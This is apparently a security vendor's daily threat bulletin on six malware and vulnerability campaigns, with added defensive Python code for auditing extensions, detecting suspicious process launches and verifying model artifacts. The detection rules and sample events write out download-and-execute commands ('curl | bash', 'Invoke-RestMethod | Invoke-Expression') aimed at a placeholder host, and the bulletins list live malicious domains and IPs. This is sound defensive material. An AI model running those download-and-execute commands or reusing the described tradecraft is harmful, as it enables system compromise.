Threat Watch Feed
🚩 – IOCs Added
The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.
🚩 GlassWASM hides malware inside VS Code extensions and uses the Solana blockchain as a resilient command-and-control platform.
Socket researchers discovered a new malware family dubbed GlassWASM embedded within trojanized Visual Studio Code extensions distributed through the Open VSX marketplace. The malicious extensions impersonated legitimate projects by copying publisher names, version numbers, repository links, and descriptions from trusted extensions while secretly embedding a TinyGo-compiled WebAssembly payload. Once installed, the extensions automatically executed a heavily obfuscated .wasm module that contained no plaintext URLs, domains, commands, or network indicators. Instead, all operational strings were encrypted using ChaCha20 and reconstructed only at runtime, making traditional signature-based detection significantly more difficult. Researchers linked the campaign with medium confidence to the GlassWorm threat actor due to similarities in infrastructure, tradecraft, and command-and-control techniques.
Rather than relying on traditional infrastructure, GlassWASM retrieves attacker instructions from the Solana blockchain. The malware queries public Solana RPC services, monitors transactions associated with an attacker-controlled wallet, extracts command-and-control information from SPL Memo transactions, and dynamically builds platform-specific payload execution commands. Depending on the victim’s operating system, GlassWASM launches commands that download and execute second-stage malware directly in memory using curl | bash on Linux and macOS or Invoke-RestMethod | Invoke-Expression on Windows. By leveraging public blockchain infrastructure as a dead-drop resolver, attackers can rapidly rotate infrastructure without modifying the malware itself, significantly increasing operational resilience and complicating takedown efforts.
Impact: Successful compromise can provide attackers with arbitrary code execution capabilities and enable delivery of additional malware, credential theft tools, cryptocurrency-focused payloads, or developer environment compromises. Because the campaign abuses trusted development tools, legitimate blockchain infrastructure, WebAssembly binaries, and dynamically resolved command-and-control channels, detection and response efforts become significantly more challenging. Organizations with software developers using Open VSX-based editors such as Cursor, Windsurf, Gitpod, and VSCodium may face elevated risk.
Recommendation:
- Review development environments for installation of `ExarGD.vsblack@0.0.1` and `noellee-doc.flint-debug@0.1.1` from the Open VSX marketplace.
- Remove identified malicious extensions and investigate any systems where the extensions were activated.
- Treat systems that executed the malicious extensions as potentially compromised and perform incident response investigations.
- Monitor for Node.js processes spawning PowerShell, bash, curl, sh, or other script interpreters.
- Alert on command lines containing `curl -fsSL | bash`, `Invoke-RestMethod | Invoke-Expression`, or similar download-and-execute patterns.
- Monitor for unexpected outbound connections from development workstations to Solana RPC infrastructure, particularly requests using `getSignaturesForAddress` and `getTransaction`.
- Investigate references to the Solana wallet `6ExrZayPZzMMSnszc42cH81DpuKT8FhCX9H6Sesn6rpz` within logs, memory, network traffic, or endpoint telemetry.
- Review software supply chain controls for Open VSX, VSCodium, Cursor, Windsurf, Gitpod, and other VS Code derivative platforms.
- Implement scanning and analysis procedures for WebAssembly (`.wasm`) files introduced into development environments and package repositories.
- Rotate developer credentials, cloud credentials, CI/CD tokens, and package repository secrets for systems potentially exposed to the malware.
- Monitor for communications to `dodod[.]lat` and investigate connections to URLs following the `/darwin/i/_`, `/linux/i/_`, and `/win32/i/_` patterns.
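An added example, not part of the original bulletin or of Socket's research: a Python audit of one editor's extensions directory for the two extension IDs listed above and for bundled `.wasm` files. It assumes the usual VS Code-family layout of one folder per extension with a `package.json` inside; the directory path is supplied by the operator, and the sample tree and its file names are constructed.

```python
import json
import tempfile
from pathlib import Path

# Extension IDs named in the bulletin, as (publisher, name, version), lowercased.
FLAGGED = {("exargd", "vsblack", "0.0.1"), ("noellee-doc", "flint-debug", "0.1.1")}


def manifest_id(ext_dir):
    """Read (publisher, name, version) from package.json; None if unreadable."""
    try:
        data = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
        return tuple(str(data[k]).lower() for k in ("publisher", "name", "version"))
    except (OSError, ValueError, KeyError, TypeError):
        return None


def audit_extensions(root):
    """Report flagged extensions and bundled .wasm files under one extensions dir."""
    findings = []
    for ext_dir in sorted(p for p in Path(root).iterdir() if p.is_dir()):
        ident = manifest_id(ext_dir)
        folder = ext_dir.name.lower()
        for pub, name, ver in sorted(FLAGGED):
            # Match on the manifest and on the folder name, since either can be edited.
            if ident == (pub, name, ver) or folder == f"{pub}.{name}-{ver}":
                findings.append((ext_dir.name, "flagged", f"{pub}.{name}@{ver}"))
            elif (ident and ident[:2] == (pub, name)) or folder.startswith(f"{pub}.{name}-"):
                findings.append((ext_dir.name, "flagged-name-other-version", f"{pub}.{name}"))
        # A .wasm file is not malicious by itself; it marks the extension for review.
        for wasm in sorted(ext_dir.rglob("*.wasm")):
            findings.append((ext_dir.name, "wasm", wasm.relative_to(ext_dir).as_posix()))
    return findings


def build_sample_tree(root):
    """Constructed sample: three extension folders, one flagged, two with .wasm."""
    samples = {
        "exargd.vsblack-0.0.1": ("ExarGD", "vsblack", "0.0.1", ["dist/core.wasm"]),
        "example.formatter-2.3.0": ("example", "formatter", "2.3.0", []),
        "example.parser-1.0.0": ("example", "parser", "1.0.0", ["out/tree.wasm"]),
    }
    for folder, (pub, name, ver, files) in samples.items():
        ext = Path(root) / folder
        ext.mkdir(parents=True)
        manifest = {"publisher": pub, "name": name, "version": ver}
        (ext / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
        for rel in files:
            (ext / rel).parent.mkdir(parents=True, exist_ok=True)
            (ext / rel).write_bytes(b"\x00asm\x01\x00\x00\x00")  # bare WASM header
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for finding in audit_extensions(build_sample_tree(tmp)):
            print(finding)
```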
🚩 ClickFix intrusion chains Potemkin, RMMProject, EtherRAT, and Cloudflare tunnels into full network compromise.
Huntress documented a sophisticated intrusion that began with a ClickFix social engineering attack and ultimately resulted in compromise of more than 11 systems across a victim network. The attack started when a user executed a malicious command from a fake troubleshooting prompt, launching an HTA payload that installed a previously undocumented malware loader dubbed Potemkin. Potemkin uses a deterministic domain generation algorithm (DGA), custom encryption routines, and reflective DLL loading to retrieve and execute follow-on payloads entirely in memory. The primary payload delivered through Potemkin was RMMProject, a Lua-based remote access framework capable of credential theft, process injection, browser compromise, remote desktop control, and dynamic module loading.
The attackers later deployed EtherRAT, a Node.js-based backdoor that resolves its command-and-control infrastructure through the Ethereum blockchain, alongside a renamed Cloudflare tunnel to establish persistent remote access. After gaining administrative credentials, the operators conducted hands-on-keyboard activity using WinRM, WMIExec, SMBExec, Chisel reverse SOCKS tunnels, PowerShell reverse shells, and multiple attempts to disable Microsoft Defender through registry modifications, service manipulation, AMSI bypasses, and exclusion path abuse. The campaign culminated in widespread lateral movement, deployment of EtherRAT across multiple hosts, and compromise of a domain controller. Huntress highlighted that the intrusion succeeded largely because the initial infected endpoint lacked monitoring, allowing attackers several hours of unrestricted access before detection controls were deployed.
Impact: Successful compromise enables credential theft, browser session hijacking, hidden remote desktop access, process injection, arbitrary code execution, lateral movement, persistence through scheduled tasks and registry Run keys, and long-term attacker access through blockchain-resolved command-and-control channels. Organizations with gaps in endpoint visibility may face significantly increased risk of rapid network-wide compromise following a single ClickFix infection.
Recommendation:
- Ensure endpoint detection and monitoring coverage is deployed across all workstations, servers, and privileged systems without exceptions.
- Educate users on ClickFix-style social engineering techniques that instruct users to paste commands into the Windows Run dialog.
- Consider disabling the Windows Run dialog (Win+R) through Group Policy where operationally feasible.
- Monitor for execution of `mshta.exe`, `pcalua.exe`, `conhost.exe --headless`, and unexpected Node.js processes executing from user-writable directories.
- Investigate registry Run key persistence entries such as `WindowsHost`, `EdgeUpdate`, or similarly benign-looking values that launch script interpreters or Node.js executables.
- Monitor for unauthorized use of Cloudflare Tunnel (`cloudflared`) and investigate renamed variants masquerading as legitimate Windows processes.
- Alert on PowerShell attempts to disable Defender, modify AMSI functionality, create Defender exclusions, or stop security services.
- Monitor for WMIExec, SMBExec, WinRM, Impacket-related activity, and unusual administrative authentication events across the environment.
- Investigate creation of scheduled tasks with randomized names that execute PowerShell, MSI installers, or remote payloads.
- Monitor for browser credential theft activity, unexpected browser process injection, and access to browser SQLite databases containing cookies or stored credentials.
- Review network traffic for communications with identified infrastructure including `77.110.122[.]58`, `213.165.41[.]26`, `cl.distritovagas[.]com`, `sonra.eutialyson[.]com`, `anus-staylard[.]xyz`, and `resumeacceptable[.]com`.
- Conduct threat hunting for Potemkin, RMMProject, EtherRAT, Chisel tunnels, Cloudflare tunnels, and associated persistence artifacts across all endpoints.
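An added example, not from the original bulletin or from Huntress or Socket: Python detection logic for the process-launch patterns named in the recommendations above and in the GlassWASM recommendations (Node.js spawning interpreters, download-and-execute command lines, mshta.exe, pcalua.exe, conhost.exe --headless, Node.js running from user-writable paths). The event field names, the list of user-writable path markers and the sample events are constructed assumptions; map them to your EDR or Sysmon schema.

```python
import re

DOWNLOAD_EXEC = [
    ("curl-pipe-shell", re.compile(r"\bcurl(\.exe)?\b[^|]*\|\s*(ba|z)?sh\b", re.I)),
    ("irm-pipe-iex", re.compile(
        r"\b(invoke-restmethod|irm)\b[^|]*\|\s*(invoke-expression|iex)\b", re.I)),
]
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "bash", "sh", "curl", "curl.exe"}
NODE = {"node", "node.exe"}
LOLBINS = {"mshta.exe", "pcalua.exe"}
# Assumed markers of user-writable locations; tune to the local estate.
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\temp\\", "\\downloads\\")


def basename(path):
    """Last path component, lowercased, for Windows or POSIX separators."""
    return re.split(r"[\\/]", path or "")[-1].lower()


def match_rules(event):
    """Return the sorted rule names a single process-creation event triggers."""
    image = event.get("image", "")
    child, parent = basename(image), basename(event.get("parent_image"))
    cmd = event.get("command_line", "")
    hits = {name for name, rx in DOWNLOAD_EXEC if rx.search(cmd)}
    if parent in NODE and child in INTERPRETERS:
        hits.add("node-spawns-interpreter")
    if child in LOLBINS:
        hits.add("lolbin-" + child)
    if child == "conhost.exe" and "--headless" in cmd.lower():
        hits.add("conhost-headless")
    if child in NODE and any(marker in image.lower() for marker in USER_WRITABLE):
        hits.add("node-from-user-writable-path")
    return sorted(hits)


def triage(events):
    """Return (host, rules) for every event that triggers at least one rule."""
    results = [(e.get("host", "?"), match_rules(e)) for e in events]
    return [(host, rules) for host, rules in results if rules]


# Constructed process-creation events; hosts, paths and URLs are placeholders.
SAMPLE_EVENTS = [
    {"host": "dev-01", "parent_image": "/usr/bin/node", "image": "/bin/sh",
     "command_line": "sh -c curl -fsSL https://example.invalid/p | bash"},
    {"host": "dev-02", "parent_image": r"C:\Program Files\nodejs\node.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -c Invoke-RestMethod https://example.invalid/p | Invoke-Expression"},
    {"host": "ws-07", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://example.invalid/a.hta"},
    {"host": "ws-07", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\conhost.exe",
     "command_line": r"conhost.exe --headless C:\Users\a\AppData\Local\n\node.exe app.js"},
    {"host": "ws-07", "parent_image": r"C:\Windows\System32\conhost.exe",
     "image": r"C:\Users\a\AppData\Local\n\node.exe", "command_line": "node.exe app.js"},
    {"host": "dev-03", "parent_image": "/usr/bin/node", "image": "/usr/bin/git",
     "command_line": "git status"},
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS):
        print(host, rules)
```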
Vertex AI SDK flaw enables cross-tenant model poisoning and remote code execution through bucket squatting attacks.
Unit 42 researchers disclosed a critical vulnerability in the Google Cloud Vertex AI Python SDK that could allow attackers to hijack machine learning model uploads and achieve remote code execution (RCE) without any access to the victim’s Google Cloud environment. The issue affected google-cloud-aiplatform SDK versions 1.139.0 and 1.140.0 and stemmed from the use of predictable default storage bucket names combined with missing ownership validation checks. By preemptively registering a bucket matching a victim’s expected Vertex AI staging bucket, an attacker could intercept model uploads, replace legitimate model artifacts with malicious versions, and ultimately execute code when the model was deployed. Google addressed the issue in versions 1.144.0 and 1.148.0, with the final ownership validation controls released on April 15, 2026.
The attack, dubbed “Pickle in the Middle,” leveraged Python pickle and Joblib deserialization behavior commonly used for machine learning models. Researchers demonstrated that attackers could use a bucket squatting technique to win a narrow race condition during model staging, replace uploaded model files with malicious payloads, and execute arbitrary code within Google-managed Vertex AI serving infrastructure. Successful exploitation enabled theft of service account tokens, access to model artifacts belonging to other deployments, visibility into BigQuery resources, cloud infrastructure reconnaissance, and potential lateral movement opportunities. Notably, exploitation required only knowledge of the victim’s Google Cloud project ID and did not require phishing, credential theft, or compromise of the victim’s cloud environment.
Impact: Successful exploitation could allow attackers to poison machine learning models, execute arbitrary code within Vertex AI serving environments, steal cloud credentials, access model artifacts from other deployments, enumerate cloud resources, and conduct follow-on attacks within affected environments. The vulnerability highlights how weaknesses in AI and ML supply chains can introduce significant risk even when core cloud infrastructure remains uncompromised.
Recommendation:
- Upgrade the Vertex AI Python SDK to version `1.148.0` or later to ensure bucket ownership validation is enforced.
- Identify and inventory all systems, applications, and CI/CD pipelines using `google-cloud-aiplatform` SDK versions `1.139.0` or `1.140.0`.
- Explicitly specify the `staging_bucket` parameter when using Vertex AI model upload functions rather than relying on automatically generated default buckets.
- Review Google Cloud Storage bucket naming practices to ensure bucket ownership is validated before use.
- Monitor Vertex AI model upload and deployment workflows for unexpected bucket locations, model replacement activity, or anomalous artifact modifications.
- Audit Vertex AI service account activity for unusual token usage, unauthorized resource access, and abnormal API activity.
- Review Cloud Logging and audit logs for unexpected access to model artifacts, BigQuery resources, or Google-managed tenant project resources.
- Monitor for model uploads originating from unexpected storage buckets or projects outside approved cloud environments.
- Implement controls to validate model integrity prior to deployment, including cryptographic signing, checksum verification, and artifact validation procedures.
- Review machine learning workflows that rely on Python pickle or Joblib deserialization and evaluate safer serialization formats where possible.
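An added example, not from the bulletin, Unit 42 or the Vertex AI SDK: one way to implement the checksum-verification recommendation above in Python, recording SHA-256 digests at build time in an HMAC-authenticated manifest and refusing to deserialize an artifact whose digest has changed. The function names, the manifest layout and the demo key are assumptions; `loader` stands for whatever deserializer the workflow uses, such as `joblib.load`.

```python
import hashlib
import hmac
import json
import tempfile
from pathlib import Path


class ArtifactMismatch(Exception):
    """Raised when a staged artifact does not match what the build recorded."""


def sha256_file(path, chunk=1 << 20):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def manifest_tag(digests, key):
    body = json.dumps(digests, sort_keys=True).encode()
    return hmac.new(key, body, hashlib.sha256).hexdigest()


def sign_manifest(artifacts, key):
    """Record file name -> SHA-256 at build time and authenticate the record."""
    digests = {Path(p).name: sha256_file(p) for p in artifacts}
    return {"digests": digests, "tag": manifest_tag(digests, key)}


def verify_artifact(path, manifest, key):
    """Check the manifest tag, then the file digest; return the path if both hold."""
    if not hmac.compare_digest(manifest_tag(manifest["digests"], key), manifest.get("tag", "")):
        raise ArtifactMismatch("manifest tag invalid")
    name = Path(path).name
    recorded = manifest["digests"].get(name)
    if recorded is None:
        raise ArtifactMismatch(f"{name} not in manifest")
    if not hmac.compare_digest(recorded, sha256_file(path)):
        raise ArtifactMismatch(f"{name} digest changed after build")
    return path


def load_verified(path, manifest, key, loader):
    """Deserialize only after verification; loader is e.g. joblib.load."""
    return loader(verify_artifact(path, manifest, key))


def demo():
    """Constructed run: sign a stand-in artifact, then overwrite it after the build."""
    key = b"constructed-demo-key"  # in practice a secret held by CI, never in the bucket
    with tempfile.TemporaryDirectory() as tmp:
        model = Path(tmp) / "model.joblib"
        model.write_bytes(b"constructed bytes standing in for a serialized model")
        manifest = sign_manifest([model], key)
        before = load_verified(model, manifest, key, loader=lambda p: "loaded")
        model.write_bytes(b"different bytes written after the build")
        try:
            after = load_verified(model, manifest, key, loader=lambda p: "loaded")
        except ArtifactMismatch as exc:
            after = str(exc)
    return before, after


if __name__ == "__main__":
    print(demo())
```

The manifest and key have to reach the loading side through a channel other than the staging bucket, otherwise whoever controls the bucket can replace both.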
🚩 NarwhalRAT Python-based malware campaign uses spear phishing and multi-stage loaders to deliver in-memory RAT targeting Korean users.
Genians disclosed an active malware campaign distributing NarwhalRAT, a Python-based remote access trojan delivered via spear phishing emails impersonating Microsoft security alerts. The campaign targets primarily Korean users and leverages ZIP attachments containing malicious LNK files that initiate a multi-stage infection chain using native Windows tools, batch scripts, and a Python runtime.
The attack relies on social engineering to prompt execution of a malicious shortcut, which launches obfuscated commands and downloads additional payloads using curl and PowerShell. A Python-based loader disguised as a .cat file is deployed and executed via a scheduled task, ultimately decrypting and launching an in-memory RAT using ctypes. The malware supports keylogging, screen capture, USB data collection, and remote command execution through a multi-C2 architecture that includes compromised websites and pCloud as a dead-drop resolver. Exploitation is confirmed in the wild as part of an active phishing campaign.
Impact: NarwhalRAT provides attackers with persistent remote access and extensive data collection capabilities, including credential and activity monitoring. Its fileless execution, use of legitimate tools, and encrypted multi-channel C2 design reduce detection likelihood and enable long-term stealthy operations. Organizations with users susceptible to phishing or lacking behavioral detection capabilities may face increased risk of data exfiltration and unauthorized system control.
Recommendation:
- Block or monitor access to known malicious domains and IPs identified in the report, especially webhostingkorea[.]com, daehoat[.]com, and novel21[.]co[.]kr.
- Detect and alert on execution chains involving LNK files launching cmd.exe, PowerShell, and curl.exe, particularly from user download or TEMP directories.
- Monitor for creation of suspicious scheduled tasks such as “MicrosoftUserInterfacePicturesUpdateTackMachine” and frequent task execution intervals.
- Identify abnormal use of Python interpreters in user environments, especially renamed binaries such as userscreen.exe executing non-standard file types.
- Enable EDR telemetry to detect in-memory execution patterns, including RWX memory allocation and ctypes-based API calls from Python processes.
- Inspect for creation of hidden directories such as `%APPDATA%\naverwhale` and unusual files in `C:\Users\Public\AccountPictures`.
- Monitor outbound connections to cloud storage services such as pCloud that may be used as covert C2 channels.
- Educate users on phishing risks, particularly emails impersonating account security alerts and encouraging attachment execution.
- Restrict execution of scripts and binaries from user-writable directories and enforce application control policies where feasible.
🚩 ESET identifies new Windows variants of the SprySOCKS backdoor used by FishMonger to target government networks.
ESET disclosed the discovery of two previously undocumented Windows variants of the SprySOCKS backdoor, attributed with high confidence to the FishMonger cyberespionage group. The malware, previously known to target Linux systems, was observed in real-world activity against government organizations in Honduras, Taiwan, Thailand, and Pakistan, expanding the group’s cross-platform capabilities.
The malware operates as a full-featured backdoor with support for over 30 commands and multiple communication protocols including TCP, UDP, and WebSocket. The WIN_DRV variant introduces kernel-level capabilities to evade detection, including hiding processes, files, network activity, and enabling covert command delivery through traffic diversion on arbitrary TCP ports. ESET confirms this activity has occurred in the wild, though initial access methods remain unconfirmed and may involve exploitation of unpatched public-facing systems; there are also limited and unconfirmed indications of potential UEFI bootkit use.
Impact: This development increases the risk of stealthy, persistent compromise in targeted environments, particularly government networks. The use of kernel drivers for evasion and covert communication significantly reduces visibility for traditional detection tools and allows attackers to maintain long-term access, conduct surveillance, and exfiltrate data with minimal indicators.
Recommendation:
Organizations should review the source material and assess exposure. Recommendations include:
- Patch and harden all public-facing applications and services to reduce the risk of initial access via known or misconfigured vulnerabilities.
- Monitor for unusual scheduled tasks, print processor registrations, or registry modifications related to persistence mechanisms such as IFEO debugger keys or print spooler components.
- Audit and restrict the use of kernel drivers, including implementing driver signing enforcement and monitoring for unauthorized driver loads.
- Use endpoint detection and response tools to identify process injection techniques such as process doppelgänging and suspicious svchost.exe activity.
- Monitor network traffic for anomalous patterns, including unexpected TCP, UDP, or WebSocket communications and use of nonstandard ports.
- Inspect for signs of hidden network connections or discrepancies between system activity and standard tools such as netstat.
- Ensure logging and alerting is enabled for firewall rule modifications and suspicious use of netsh commands.
- Review systems for unauthorized file placements in directories such as %SystemRoot%\Fonts and print spooler paths.
- Enforce least privilege and limit administrative access to reduce the impact of potential compromise.
🚩 DragonForce Uses Microsoft Teams TURN Relays to Hide C2 Traffic During Ransomware Intrusion
Symantec and Carbon Black reported a DragonForce ransomware intrusion against a major U.S. services firm where attackers hid command-and-control traffic inside Microsoft Teams relay infrastructure. The attackers used a custom Go-based RAT tracked as Backdoor.Turn, which obtains an anonymous Microsoft Teams visitor token from Skype-backed identity services, uses legitimate Microsoft TURN relay infrastructure for connection setup, and then establishes a QUIC session to the attacker-controlled C2 server. Symantec noted this is the first known malware observed abusing Microsoft Teams TURN relay infrastructure in this manner.
The attackers were present in the victim network for one to two months and likely gained access by exploiting an SQL or MSSQL server vulnerability or through access purchased from an access broker. After initial access, they deployed a malicious ZIP containing a legitimate VirtualBox/DbgView executable and a sideloaded malicious DLL, modified firewall and access settings, added users or groups, and used Bring Your Own Vulnerable Driver techniques to terminate security processes. The operation included exploitation of multiple vulnerable drivers, including Huawei’s HWAuidoOs2Ec.sys through a novel “Havoc Process Terminator” technique, plus wsftprm.sys, Gamedriverx64.sys, K7RKScan.sys, and the custom Abyss Worker driver masquerading as a Palo Alto driver.
Impact: Successful compromise can allow ransomware operators to maintain stealthy access, evade security tooling, perform reconnaissance, move laterally, steal credentials, exfiltrate data, and deploy ransomware. Backdoor.Turn is especially difficult to detect through standard network monitoring because visible traffic may appear to be legitimate Microsoft Teams relay traffic. The malware also supports command execution, process creation, network scanning, LDAP and Active Directory searches, credential-based lateral movement, and browser credential theft. The use of multiple vulnerable drivers and a custom malicious driver increases the risk that endpoint protection and response tools may be terminated before ransomware deployment.
Recommendation:
- Monitor for unusual Microsoft Teams TURN relay usage from servers or endpoints that do not normally initiate Teams media relay traffic.
- Correlate Teams relay connections with suspicious endpoint activity, including process injection, QUIC sessions, unusual child processes, or outbound connections to unknown infrastructure.
- Monitor for downloads of TechSupV18Fix3.zip or other suspicious ZIP archives used for tool staging.
- Hunt for DLL sideloading involving legitimate VirtualBox or DbgView executables loading suspicious vboxrt.dll files.
- Review endpoints for malicious or suspicious driver loading, including HWAuidoOs2Ec.sys, wsftprm.sys, Gamedriverx64.sys, K7RKScan.sys, and Abyss Worker driver variants.
- Enable vulnerable driver blocklists and enforce controls that prevent unsigned, abused, or known vulnerable drivers from loading.
- Monitor for security process termination, AV killer tools, and kernel-level driver activity used to disable protection.
- Review Windows firewall changes, newly added local users or groups, and LimitBlankPassword configuration changes.
- Hunt for AD reconnaissance tools such as ADExplore and network scanners appearing shortly before ransomware activity.
- Monitor for browser credential theft, LDAP queries, credential-based lateral movement, and internal network scanning after initial compromise.
- Maintain offline or immutable backups and verify recovery readiness in case ransomware deployment follows stealthy post-compromise activity.
About TIGR Threat Watch
Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.




